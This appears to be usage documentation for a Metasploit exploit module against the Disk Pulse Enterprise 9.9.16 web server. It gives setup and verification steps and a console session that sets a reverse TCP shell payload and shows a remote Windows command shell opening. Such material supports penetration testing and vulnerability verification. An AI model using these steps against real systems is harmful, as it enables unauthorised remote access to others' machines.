## Vulnerable Application

  Tested on Windows 7 x64 and x86.

  Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port.

  [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe)

## Verification Steps

  1. Install the application and set the option above to enable the web server
  2. Start msfconsole
  3. Do: ```use exploit/windows/http/disk_pulse_enterprise_get```
  5. Set options and payload
  6. Do: ```run```
  7. You should get a shell.

## Options

  **RHOST**

  IP address of the remote host running the server.

  **RPORT**

  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.

## Scenarios

  To obtain a shell:

  ```
msf > use exploit/windows/http/disk_pulse_enterprise_get
msf exploit(disk_pulse_enterprise_get) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(disk_pulse_enterprise_get) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(disk_pulse_enterprise_get) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(disk_pulse_enterprise_get) > set LPORT 1234
LPORT => 1234
msf exploit(disk_pulse_enterprise_get) > set RPORT 8080
RPORT => 8080
msf exploit(disk_pulse_enterprise_get) > exploit

[*] Started reverse TCP handler on y.y.y.y:1234
[*] Generating exploit...
[*] Sending exploit...
[*] Command shell session 1 opened (y.y.y.y:1234 -> x.x.x.x:64567) at 2017-09-14 10:52:06 -0500

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
  ```
